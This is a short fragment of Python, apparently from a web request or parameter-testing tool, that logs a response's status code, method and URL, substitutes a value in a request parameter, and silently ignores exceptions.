(resp.getcode(), self.method, resp.geturl())) param[item[0]] = item[1].replace(x[0], item[1]) except Exception as error: pass